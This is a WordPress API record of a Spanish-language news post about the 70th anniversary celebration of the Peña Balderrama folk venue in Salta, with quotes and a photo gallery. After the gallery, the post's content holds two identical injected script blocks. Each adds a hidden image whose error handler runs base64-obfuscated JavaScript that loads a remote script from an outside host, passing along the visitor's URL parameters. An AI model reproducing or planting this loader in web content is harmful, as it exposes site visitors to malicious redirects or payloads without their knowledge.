{"id":2426,"date":"2023-03-30T10:55:12","date_gmt":"2023-03-30T13:55:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2426"},"modified":"2025-08-14T00:20:11","modified_gmt":"2025-08-14T03:20:11","slug":"la-pena-balderrama-festejo-sus-70-anos-con-miles-de-saltenos-y-turistas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2426","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-88796\">La Pe\u00f1a Balderrama festej\u00f3 sus 70 a\u00f1os con miles de salte\u00f1os y turistas<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7a094b\"><em>En la tradicional esquina de San Mart\u00edn y Esteco, artistas y p\u00fablico brindaron un sentido homenaje al tradicional boliche folcl\u00f3rico, \u00edcono de la cultura de Salta en el mundo.<\/em><\/h4>\n\n\n\n<p>\u201cA orillas del canal, cuando llega la ma\u00f1ana, sale cantando la noche, desde lo de Balderrama\u201d. El viejo boliche, lugar de encuentro de artistas y bohemios, fue inmortalizado en una zamba por la magia de Manuel Castilla y Gustavo Leguizam\u00f3n.<\/p>\n\n\n\n<p>Hoy es la Pe\u00f1a m\u00e1s conocida de Argentina y un \u00edcono cultural y tur\u00edstico que traslada a sus \u2074 a una \u00e9poca cumbre del folclore argentino. Pasaron 70 a\u00f1os desde que abri\u00f3 sus puertas con un festejo con miles de espectadores en la tradicional esquina de San Mart\u00edn y Esteco.<\/p>\n\n\n\n<p>La cartelera de artistas invitados la integraron Los Guitarreros, Las Voces de Or\u00e1n, Diableros de Or\u00e1n, Anita Brizuela, Comparsa Los Incas, entre otros.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6429-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6429-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"La Pe\u00f1a Balderrama festej\u00f3 sus 70 a\u00f1os con miles de salte\u00f1os y turistas\" width=\"-347\" height=\"-231\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cIntentamos preservar la esencia marcada por mi padre, que este sea un lugar de encuentro y respeto a lo que somos\u201d, repiti\u00f3 en varias entrevistas&nbsp;<strong>Patricia Balderrama<\/strong>, hija de Juan, uno de los tres hermanos Balderrama que hace 70 a\u00f1os iniciaron este camino.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes de Salta&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;particip\u00f3 en los festejos y destac\u00f3 lo que significa para la actividad tur\u00edstica la Pe\u00f1a Balderrama. \u201cEs uno de nuestros \u00edconos tur\u00edsticos, pero adem\u00e1s un legado que preserva una parte central de nuestra identidad\u201d, indic\u00f3 el funcionario.<\/p>\n\n\n\n<p>La letra de la zamba creada por el \u201cCuchi Leguizam\u00f3n\u201d y Manuel Castilla pasaron por la voz de decenas se artistas argentinos, destac\u00e1ndose en este grupo Mercedes Sosa, quien la llev\u00f3 por el mundo. &nbsp;Las paredes de la Pe\u00f1a reflejan 70 a\u00f1os de personalidades que pasaron por el lugar.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2428\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2428\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2954-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2427\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2427\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2955-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2430\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2430\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2956-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2429\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2429\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2957-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2431\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2431\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2958-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"2432\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88796-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg\" alt=\"\" class=\"wp-image-2432\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88796-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/88796-la-penia-balderrama-festejo-sus-70-anios-con-miles-de-saltenios-y-turistas-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la tradicional esquina de San Mart\u00edn y Esteco, artistas y p\u00fablico brindaron un sentido homenaje al tradicional boliche folcl\u00f3rico, \u00edcono de la cultura de Salta en el mundo. \u201cA orillas del canal, cuando llega la ma\u00f1ana, sale cantando la noche, desde lo de Balderrama\u201d. El viejo boliche, lugar de encuentro de artistas y bohemios, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2432,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-2426","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2426"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2426"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2426\/revisions"}],"predecessor-version":[{"id":7131,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2426\/revisions\/7131"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2432"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2426"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2426"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2426"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}